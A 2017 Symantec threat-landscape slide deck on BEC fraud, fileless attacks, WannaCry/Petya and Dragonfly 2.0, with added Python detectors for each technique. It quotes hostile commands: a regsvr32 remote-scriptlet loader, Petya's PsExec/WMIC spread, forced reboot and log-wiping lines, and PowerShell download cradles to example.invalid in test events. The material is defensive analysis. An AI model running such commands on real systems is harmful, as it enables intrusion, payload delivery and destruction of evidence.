Threat Landscape Q2 / 2017 Update
Asim Rab
Candid Wueest
Sept 2017
Copyright © 2017 Symantec Corporation
General trends
Simple, but successful
o Low-tech attacks (BEC)
o Living off the land and fileless
o Emails with social engineering
Focused and selective
o More ransomware in corporations
o Selective spreading of malware
o Attacking supply chain companies
Malware statistics
o More than 2 million new malware variants per day
o Script-based malware accounts for many of these variants, since scripts are trivially re-obfuscated into new hashes

Region          % of global
USA             27.26%
Japan           6.49%
China           6.04%
India           5.82%
Brazil          4.12%
Germany         3.97%
Great Britain   3.59%
Canada          2.65%
France          2.55%
Russia          2.32%
Australia       2.17%
Italy           2.03%
Mexico          1.67%
South Korea     1.34%
Turkey          1.28%
Netherlands     1.27%
Spain           1.26%
Indonesia       1.11%
Poland          1.08%
Taiwan          0.90%

[Chart: new malware variants per month in millions, January to August 2017, y-axis 0 to 100]
Web attacks still elevated
o Normally no zero-day exploits are used
o The RIG exploit kit is the most active
o Links are spread by email or by advertisements (malvertising)
o Sometimes infections are restricted to specific IP addresses
o Supply chain attacks increased
[Chart: web attacks blocked per day, January to August 2017, y-axis 0 to 1,400,000]
Malicious documents still common
o Malicious document containing a macro, with social engineering to make the user enable it
o Embedded binary that can be double-clicked
o More than half of the malicious attachments are script files
o Macros or JavaScript usually download the final payload
o The most common payloads are ransomware and financial Trojans
Email (e.g. invoice or receipt) -> Attachment (e.g. JavaScript) -> Downloader (e.g. PowerShell) -> Payload (e.g. ransomware)
Whitepaper available
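The attachment-to-downloader hop in this chain leaves a characteristic trace: a PowerShell (or cmd) process whose parent is a script host or an Office application, carrying a download cradle or an -EncodedCommand blob. The following is an added example, not code from the Symantec deck, that runs such rules over Windows process-creation events (Sysmon Event ID 1 style fields) and decodes the UTF-16LE base64 that -EncodedCommand expects so the cradle inside it is visible too. All events, host names and the example.invalid URLs are constructed for illustration.

```python
"""Flag the script-attachment -> PowerShell downloader step from process events.
Added example; events below are constructed, not real telemetry."""
import base64
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Strings that fetch or evaluate remote code in PowerShell.
CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer"
    r"|net\.webclient|invoke-expression|\biex\b", re.I)
# -e / -ec / -en / -enc / -encodedcommand followed by a base64 blob.
ENCODED = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)


def _b64_utf16(script: str) -> str:
    """Encode a script the way powershell -EncodedCommand expects (UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events: host, parent image, child image, child command line.
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -c \"IEX (New-Object "
                "Net.WebClient).DownloadString('http://example.invalid/a.ps1')\""},
    {"host": "ws02", "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -enc " + _b64_utf16(
         "(New-Object Net.WebClient).DownloadFile('http://example.invalid/x.exe',"
         "'C:\\Users\\Public\\x.exe')")},
    {"host": "ws03", "parent": r"C:\Windows\explorer.exe",          # benign admin script
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\inventory.ps1"},
    {"host": "ws04", "parent": r"C:\Windows\System32\wscript.exe",  # weak signal on its own
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c echo hello"},
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand script, or None if there is none."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event: dict) -> list:
    """Reasons why one event looks like the script-attachment -> downloader step."""
    parent, child = basename(event["parent"]), basename(event["image"])
    if child not in SHELLS:
        return []
    reasons = []
    if parent in SCRIPT_HOSTS:
        reasons.append(f"{child} spawned by script host {parent}")
    elif parent in OFFICE_APPS:
        reasons.append(f"{child} spawned by Office application {parent}")
    text = event["cmdline"]
    decoded = decode_encoded_command(text)
    if decoded is not None:
        reasons.append("encoded command decoded")
        text = text + " " + decoded            # inspect the decoded script as well
    if CRADLE.search(text):
        reasons.append("download cradle in command line")
    if HIDDEN.search(text):
        reasons.append("hidden window")
    return reasons


def suspicious_events(events) -> dict:
    """Map host -> reasons for every event that triggered at least one rule."""
    out = {}
    for ev in events:
        reasons = classify(ev)
        if reasons:
            out[ev["host"]] = reasons
    return out


if __name__ == "__main__":
    for host, reasons in suspicious_events(SAMPLE_EVENTS).items():
        print(host, "->", "; ".join(reasons))
```

A lone "spawned by script host" reason (ws04) is a weak signal, since logon scripts do the same; the cradle, encoded-command and hidden-window reasons are what raise an event from triage to alert.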
Section 2: Business Email Compromise (BEC)
Low-tech attacks: Business email compromise
o Spear-phishing taken to the next level
o Convince the company to perform a payment transaction
o Scams often use typo-squatted domains
o Some attacks change the IBAN in invoices
o Exposed losses from Oct 2013 to Dec 2016 were over $5bn
o 8,000 businesses targeted monthly
[Chart: BEC emails received per targeted organization, Jan to Jun 2017; monthly values as extracted: 4.3, 6.8, 4.5, 5.1, 5.9, 4.6]
BEC subject lines
o The top three subjects (PAYMENT, URGENT, REQUEST) feature in 2/3 of all emails
o They create a sense of urgency, requiring immediate action, to pressure the recipient into acting
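The indicators on these two slides (typo-squatted sender domains, changed IBANs in invoices, and the PAYMENT / URGENT / REQUEST subject words) can be turned into a mail-gateway triage check. The following is an added example and not code from the Symantec deck: it compares the sender domain against trusted domains after undoing common look-alike substitutions, flags a Reply-To that diverges from From, counts urgency words in the subject, and validates any IBAN in the body with the ISO 13616 mod-97 check before comparing it with the vendor's bank details on file. The organisation domain, the vendor master data and all messages are constructed for illustration.

```python
"""BEC triage over inbound mail headers and body. Added example with constructed data."""
import re
from difflib import SequenceMatcher

OWN_DOMAIN = "example-corp.com"                                    # assumed defended domain
VENDOR_IBANS = {"vendor-supplies.net": "GB82WEST12345698765432"}   # constructed master data
TRUSTED_DOMAINS = {OWN_DOMAIN, *VENDOR_IBANS}
URGENCY_WORDS = {"payment", "urgent", "request"}                   # top three BEC subjects
IBAN_RE = re.compile(r"\b([A-Z]{2}\d{2}(?:\s?[A-Z0-9]){11,30})\b")

# Constructed messages: one lookalike-domain CFO spoof, one changed-IBAN invoice,
# one Reply-To hijack from a genuine internal address, one legitimate invoice.
SAMPLE_MESSAGES = [
    {"From": '"Jane Doe, CFO" <jane.doe@exarnple-corp.com>',
     "Subject": "URGENT: wire payment request", "body": "Please pay invoice 4471 today."},
    {"From": "accounts@vendor-supplies.net",
     "Subject": "Invoice 4471 - updated bank details",
     "body": "Please use our new account: IBAN DE89 3704 0044 0532 0130 00"},
    {"From": "jane.doe@example-corp.com", "Reply-To": "jane.doe@mail-example.invalid",
     "Subject": "Quick request", "body": "Are you at your desk?"},
    {"From": "accounts@vendor-supplies.net", "Subject": "Invoice 4470",
     "body": "IBAN GB82 WEST 1234 5698 7654 32 as usual."},
]


def normalise(domain: str) -> str:
    """Undo common look-alike substitutions (rn->m, vv->w, 0->o, 1->l, 3->e, 5->s)."""
    d = domain.lower()
    for bad, good in (("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")):
        d = d.replace(bad, good)
    return d


def similarity(a: str, b: str) -> float:
    a, b = normalise(a), normalise(b)
    return 1.0 if a == b else SequenceMatcher(None, a, b).ratio()


def lookalike(domain: str):
    """(trusted domain, similarity) for the closest look-alike above 0.85, else None."""
    if domain in TRUSTED_DOMAINS:
        return None                                  # an exact match is not a look-alike
    best = max(TRUSTED_DOMAINS, key=lambda t: similarity(domain, t))
    score = similarity(domain, best)
    return (best, score) if score >= 0.85 else None


def iban_valid(iban: str) -> bool:
    """ISO 13616 mod-97: move the first four characters to the end, map A=10..Z=35."""
    s = iban.replace(" ", "").upper()
    if not re.fullmatch(r"[A-Z]{2}\d{2}[A-Z0-9]{11,30}", s):
        return False
    digits = "".join(str(int(c, 36)) for c in s[4:] + s[:4])
    return int(digits) % 97 == 1


def addr_domain(addr: str) -> str:
    m = re.search(r"@([A-Za-z0-9.-]+)", addr)
    return m.group(1).lower() if m else ""


def triage(msg: dict) -> list:
    """Return the BEC indicators present in one message."""
    reasons = []
    from_dom = addr_domain(msg["From"])
    reply_dom = addr_domain(msg.get("Reply-To", msg["From"]))
    hit = lookalike(from_dom)
    if hit:
        reasons.append(f"sender domain {from_dom} resembles trusted domain {hit[0]} ({hit[1]:.2f})")
    if reply_dom and reply_dom != from_dom:
        reasons.append(f"Reply-To domain {reply_dom} differs from From domain {from_dom}")
    words = set(re.findall(r"[a-z]+", msg["Subject"].lower())) & URGENCY_WORDS
    if words:
        reasons.append("urgency subject words: " + ", ".join(sorted(words)))
    on_file = VENDOR_IBANS.get(from_dom)
    for raw in IBAN_RE.findall(msg.get("body", "")):
        iban = raw.replace(" ", "")
        if not iban_valid(iban):
            reasons.append(f"IBAN {iban} fails checksum")
        elif on_file and iban != on_file:
            reasons.append(f"IBAN {iban} differs from {from_dom} bank details on file")
    return reasons


if __name__ == "__main__":
    for m in SAMPLE_MESSAGES:
        print(m["Subject"], "->", triage(m) or "clean")
```

The mod-97 step matters because a single-digit edit to an IBAN always fails the checksum, so a valid-but-different IBAN is the case that needs master data; a message that passes every rule here can still be BEC, since a genuinely compromised mailbox produces none of these header artefacts.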
Section 3: Living off the land
Whitepaper available
Living off the land
When attackers turn what you have against you
o Fewer new files on disk
  o more difficult to detect the attack, and no IoC to share
o Use of off-the-shelf tools and cloud services
  o difficult to determine intent and source
o These tools are ubiquitous
  o hiding in plain sight
o Finding exploitable zero-day vulnerabilities is getting more difficult
  o so attackers use simple and proven methods such as email and social engineering
Fileless attacks
Multiple fileless options exist, but not all are truly fileless:
o Memory-only attacks: e.g. remote code exploits such as EternalBlue and CodeRed
o Non-PE files: documents containing macros, PDFs with JavaScript, and scripts (VBS, JavaScript, PowerShell, …)
o Fileless loadpoint: hiding scripts in the registry, WMI or GPO, e.g. Poweliks and Kotver
o Dual-use tools: using benign tools, such as PsExec, to do malicious things
Living off the land attack chain
Incursion
o Exploit in memory, e.g. SMB EternalBlue
o Email with non-PE file, e.g. document macro
o Weak or stolen credentials, e.g. RDP password guess
o Remote script dropper, e.g. LNK with PowerShell from cloud
Persistence
o Non-persistent: memory-only malware, e.g. SQL Slammer
o Persistent: fileless persistence loadpoint, e.g. JScript in registry; or traditional methods
Payload
o Regular non-fileless payload
o Non-PE file payload, e.g. PowerShell script
o Memory-only payload, e.g. Mirai DDoS
o Dual-use tools, e.g. netsh or PsExec.exe
Non-PE files
o Scripts are very common, especially PowerShell
o Many script toolkits are available, e.g. PowerShell Empire
o Scripts are easy to obfuscate and difficult to detect with signatures
o Scripts are flexible and can be adapted quickly
Whitepaper available
Fileless loadpoints
Example: remote SCT load
o A registry Run key can point to a remote SCT (scriptlet) file
o Regsvr32 will download and execute the embedded JScript:
Regsvr32 /s /n /u /i:%REMOTE_MALICIOUS_SCT_SCRIPT% scrobj.dll
o Downloader.Dromedan (40,000 detections per day)
o The embedded JScript uses WMI to execute a PowerShell payload
o The script stores an encoded DLL in the registry for later use
[Figure: malicious .sct file]
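The regsvr32 line above works because `/n` skips DllRegisterServer, `/u` asks for the uninstall path, and `/i:<arg>` hands `<arg>` to scrobj.dll's DllInstall, which treats it as a scriptlet location; with a URL there, nothing but a registry value ever lands on disk. The following is an added example, not code from the Symantec deck, that scans `reg query` text output of the Run key for this loadpoint and for the related registry-resident script tricks (rundll32 `javascript:` as used by Poweliks, script hosts or inline `vbscript:`/`javascript:` in an autostart value). The registry listing, value names and example.invalid URL are constructed for illustration.

```python
"""Scan `reg query ...\Run` output for fileless loadpoints. Added example, constructed input."""
import re

# Constructed `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` output.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Updater    REG_SZ    regsvr32 /s /n /u /i:http://example.invalid/p.sct scrobj.dll
    Helper    REG_SZ    rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("...")
    Sync    REG_EXPAND_SZ    "%ProgramFiles%\Vendor\sync.exe" /tray
"""

# `reg query` prints values as: <4 spaces><name><4 spaces><REG_type><4 spaces><data>
VALUE_LINE = re.compile(r"^\s+(?P<name>.+?)\s+(?P<type>REG_[A-Z_]+)\s+(?P<data>.*)$")
SCRIPT_HOSTS = re.compile(r"\b(?:wscript|cscript|mshta|powershell|pwsh)(?:\.exe)?\b", re.I)


def parse_reg_query(text: str) -> list:
    """Return (key, value name, type, data) tuples from `reg query` text."""
    rows, key = [], None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
            continue
        m = VALUE_LINE.match(line)
        if m and key:
            rows.append((key, m["name"], m["type"], m["data"]))
    return rows


def loadpoint_reasons(data: str) -> list:
    """Why an autostart command line looks like a fileless loadpoint."""
    reasons = []
    low = data.lower()
    if "regsvr32" in low and "scrobj.dll" in low:
        reasons.append("regsvr32 scriptlet loadpoint (scrobj.dll)")
        m = re.search(r'/i:"?([^\s"]+)', data, re.I)
        target = m.group(1) if m else ""
        if re.match(r"(?:https?://|\\\\)", target, re.I):     # URL or UNC path
            reasons.append(f"remote SCT target {target}")
    if "rundll32" in low and "javascript:" in low:
        reasons.append("rundll32 javascript: inline script (Poweliks-style)")
    if SCRIPT_HOSTS.search(data) or re.search(r"\b(?:vbscript|javascript):", low):
        reasons.append("script host or inline script in autostart value")
    return reasons


def scan(text: str) -> list:
    """All Run values with at least one loadpoint reason."""
    findings = []
    for key, name, vtype, data in parse_reg_query(text):
        reasons = loadpoint_reasons(data)
        if reasons:
            findings.append({"key": key, "value": name, "type": vtype,
                             "data": data, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_REG_QUERY):
        print(f"{f['key']}\\{f['value']}: {'; '.join(f['reasons'])}")
```

The same rules apply to HKLM Run/RunOnce, to the `Winlogon\Shell` and `Userinit` values, and to scheduled-task actions; the script deliberately keys on scrobj.dll plus `/i:` rather than on regsvr32 alone, because registering a genuine COM DLL from a Run key is unusual but not malicious.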
Section 4: Ransomware
Whitepaper available
Ransomware stats
o Ransomware is still profitable and common
o Multiple self-propagating variants appeared
[Chart: ransomware per month with trend line, Jan 2016 to Jun 2017, y-axis 0 to 90,000]

Ransomware by country (share of total):
United States    29%
Japan             9%
Italy             8%
India             4%
Germany           4%
Netherlands       3%
UK                3%
Australia         3%
Russia            3%
Canada            3%
Other countries  31%
Ransomware in enterprises
o 42% of ransomware infections in 2017 were in enterprises
  o due to WannaCry and Petya
o Attacks against cloud storage increased
[Chart: ransomware infections per month, consumer vs. enterprise, Jan 2016 to Jun 2017, y-axis 0 to 60,000]
WannaCry
o 1 billion EternalBlue infection attempts blocked
o Profit $140K; Bitcoin accounts emptied August 3rd
o Linked to the Lazarus group
[Chart: WannaCry activity over time, y-axis 0 to 120,000]
Petya
o Petya (June variant) classified as a wiper
o Semi-targeted infections through a supply chain hack (MEDoc)
o Profit $10K; Bitcoin account emptied July 4th
[Chart: Petya activity over time, y-axis 0 to 160]
Petya uses dual-use tools
o The threat is a DLL executed by rundll32.exe
o Uses a recompiled version of the LSADump module of Mimikatz to get passwords
o Uses PsExec to propagate:
  \\[server_name]\admin$\perfc.dat
  psexec rundll32.exe c:\windows\perfc.dat #1 [RANDOM]
o Uses WMI to propagate if PsExec fails:
  wmic.exe /node:[IP Address] /user:[USERNAME] /password:[PASSWORD] process call create "%System%\rundll32.exe \"%Windows%\perfc.dat\" #1 60"
o Creates a scheduled task to restart into the malicious MBR payload:
  schtasks /RU "SYSTEM" /Create /SC once /TN "" /TR "%system%\shutdown.exe /r /f" /ST 14:42
o Deletes log files to hide its traces:
  wevtutil cl Setup & wevtutil cl System & … & fsutil usn deletejournal /D %C:
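Every tool on this slide is legitimate in isolation: administrators run PsExec, WMI remote process creation, scheduled reboots and `wevtutil cl` every day. What distinguishes Petya is the sequence on one host in a short window: remote execution, then a forced reboot or log clearing. The following is an added example, not code from the Symantec deck, that tags process-creation events by category and escalates a host only when that sequence appears; it also flags rundll32 loading a non-.dll file by ordinal, which is how the `perfc.dat` payload is invoked. Events, host names, addresses and timestamps are constructed for illustration, with `[PASSWORD]` left as a placeholder as on the slide.

```python
"""Correlate Petya-style dual-use tool activity per host. Added example, constructed events."""
import re
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=15)     # assumed: how close remote exec and cleanup must be

# (category, description, regex on the command line, restrict to image name or None)
RULES = [
    ("remote-exec", "WMI remote process creation",
     re.compile(r"/node:\S+.*process\s+call\s+create", re.I), "wmic.exe"),
    ("remote-exec", "PsExec remote execution", re.compile(r"\bpsexec", re.I), None),
    ("reboot", "scheduled forced reboot",
     re.compile(r"schtasks.*?/create.*?shutdown(?:\.exe)?\s.*?/r", re.I), None),
    ("anti-forensics", "event log cleared", re.compile(r"wevtutil(?:\.exe)?\s+cl\b", re.I), None),
    ("anti-forensics", "USN journal deleted", re.compile(r"fsutil\s+usn\s+deletejournal", re.I), None),
]
# rundll32 loading a file by export ordinal: rundll32 <file> #1
ORDINAL_LOAD = re.compile(r'rundll32(?:\.exe)?\s+"?([^"\s]+)"?\s*,?\s*#\d+', re.I)

# Constructed events: (ISO timestamp, host, image, command line).
SAMPLE_EVENTS = [
    ("2017-06-27T12:00:05", "srv01", r"C:\Windows\System32\rundll32.exe",
     r"rundll32.exe C:\Windows\perfc.dat #1 60"),
    ("2017-06-27T12:00:40", "srv01", r"C:\Windows\System32\wbem\wmic.exe",
     r'wmic.exe /node:10.0.0.7 /user:CORP\admin /password:[PASSWORD] process call create '
     r'"C:\Windows\System32\rundll32.exe \"C:\Windows\perfc.dat\" #1 60"'),
    ("2017-06-27T12:01:10", "srv01", r"C:\Windows\System32\schtasks.exe",
     r'schtasks /RU "SYSTEM" /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 14:42'),
    ("2017-06-27T12:01:30", "srv01", r"C:\Windows\System32\cmd.exe",
     r"cmd.exe /c wevtutil cl Setup & wevtutil cl System & fsutil usn deletejournal /D C:"),
    ("2017-06-27T09:00:00", "srv02", r"C:\Tools\PsExec.exe",          # admin deployment
     r"PsExec.exe \\srv03 -accepteula -s cmd.exe /c gpupdate /force"),
    ("2017-06-27T10:30:00", "ws05", r"C:\Windows\System32\wevtutil.exe",  # log housekeeping
     r"wevtutil cl Application"),
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def tag_event(image: str, cmdline: str) -> list:
    """Return [(category, description)] for one process-creation event."""
    tags = []
    img = basename(image)
    for cat, desc, rx, only in RULES:
        if (only is None or img == only) and rx.search(cmdline):
            tags.append((cat, desc))
    if img == "rundll32.exe":
        m = ORDINAL_LOAD.search(cmdline)
        if m and not m.group(1).lower().endswith(".dll"):
            tags.append(("suspicious-load", f"rundll32 ordinal call on non-DLL file {m.group(1)}"))
    return tags


def correlate(events) -> dict:
    """Per host: tags in time order, plus 'escalate' when remote execution is
    followed within WINDOW by anti-forensics or a forced reboot."""
    per_host = {}
    for ts, host, image, cmdline in events:
        t = datetime.fromisoformat(ts)
        for cat, desc in tag_event(image, cmdline):
            per_host.setdefault(host, []).append((t, cat, desc))
    report = {}
    for host, tags in per_host.items():
        tags.sort()
        escalate = any(
            c2 in ("anti-forensics", "reboot") and timedelta(0) <= t2 - t1 <= WINDOW
            for t1, c1, _ in tags if c1 == "remote-exec"
            for t2, c2, _ in tags)
        report[host] = {"tags": [(c, d) for _, c, d in tags], "escalate": escalate}
    return report


if __name__ == "__main__":
    for host, r in correlate(SAMPLE_EVENTS).items():
        print(host, "ESCALATE" if r["escalate"] else "info", r["tags"])
```

On the slide's hosts the WMI line is seen on the source of the lateral movement; the target side shows up as a `rundll32.exe perfc.dat #1` child of `WmiPrvSE.exe` or `PSEXESVC.exe`, so in production the parent image is worth adding to the rules.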
Section 5: Targeted attack groups
Dragonfly 2.0
o Active since December 2015 in Europe and North America
o Ongoing attacks against the energy sector, mainly in Turkey and the U.S.
Infiltration
o Compromised websites and spear phishing (Phishery toolkit)
o Trojanized software, using the Shellter evasion framework
o Various backdoors:
• Trojan.Listrix
• Trojan.Credrix
• Backdoor.Goodor
• Backdoor.Dorshell
• Trojan.Karagany.B
• Trojan.Heriplor
Slide deck available
Dragonfly 2.0
o Uses living off the land tactics
  o PowerShell, PsExec, and BITSAdmin
o The Phishery toolkit became available on GitHub in 2016
  o Documents used an SMB template link to leak credentials
o Screenutil and Shellter are available online
Goal
o Information stealing: passwords, documents and screenshots
o Potential for sabotage attacks
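The template-link trick works because a .docx is a zip package and Word resolves the `attachedTemplate` relationship in `word/_rels/settings.xml.rels` as soon as the document opens; when that relationship is marked External and points at a UNC path, the client authenticates to the share (NTLM over SMB) before the user sees a page, and a web target produces an authentication prompt the same way. The following is an added example, not code from the Symantec deck or from Phishery, that inspects a document for external relationships of the kinds Word fetches automatically. The `build_docx` helper constructs a deliberately minimal package in memory so the scanner can be exercised offline; it is not a complete, openable .docx, and the UNC and example.invalid targets are constructed.

```python
"""Detect remote-template (credential-leak) injection in .docx packages. Added example."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
# Relationship types Word resolves on open without user interaction.
AUTO_FETCHED = {"attachedTemplate", "oleObject", "image"}


def build_docx(template_target=None) -> bytes:
    """Constructed minimal package; with a target, settings.xml points at an external template."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        if template_target is None:
            z.writestr("word/settings.xml", "<w:settings/>")
        else:
            z.writestr("word/settings.xml",
                       '<w:settings><w:attachedTemplate r:id="rId1"/></w:settings>')
            z.writestr("word/_rels/settings.xml.rels",
                       f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" '
                       f'Type="http://schemas.openxmlformats.org/officeDocument/2006/'
                       f'relationships/attachedTemplate" '
                       f'Target="{template_target}" TargetMode="External"/></Relationships>')
    return buf.getvalue()


def external_relationships(docx_bytes: bytes) -> list:
    """Every External relationship in the package, with a credential-leak verdict."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                target = rel.get("Target", "")
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                # UNC, http(s) or file: targets make the client authenticate or fetch on open.
                leaks = rtype in AUTO_FETCHED and bool(
                    re.match(r"(?:https?://|\\\\|file:)", target, re.I))
                findings.append({"part": name, "type": rtype,
                                 "target": target, "credential_leak": leaks})
    return findings


def is_template_injected(docx_bytes: bytes) -> bool:
    """True when an external attachedTemplate would be fetched on open."""
    return any(f["credential_leak"] and f["type"] == "attachedTemplate"
               for f in external_relationships(docx_bytes))


if __name__ == "__main__":
    for target in (r"\\10.0.0.5\share\normal.dotx", "https://example.invalid/t.dotx", None):
        print(target, "->", external_relationships(build_docx(target)))
```

Hyperlinks are also External relationships but need a click, which is why the verdict keys on the `AUTO_FETCHED` types; on the network side the same leak shows up as outbound SMB (TCP 445) from a workstation to an unfamiliar host right after a document is opened.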
Supply chain attacks increasing
o Many cases where legitimate software was compromised
o Fast and semi-targeted distribution through the update process
o Trojanized updates are difficult to discover
  o trusted domain, digitally signed, trusted update process, …
Examples:
o MEDoc (Petya, June 2017)
o CCleaner (August 2017)
o Python modules (September 2017)
o ICS supplier (Dragonfly, 2014)
Summary
o Cybercriminals are focusing on simple but effective methods
o Ransomware is still very prevalent
o Living off the land tactics are increasingly used
o Often targeted infections with limited distribution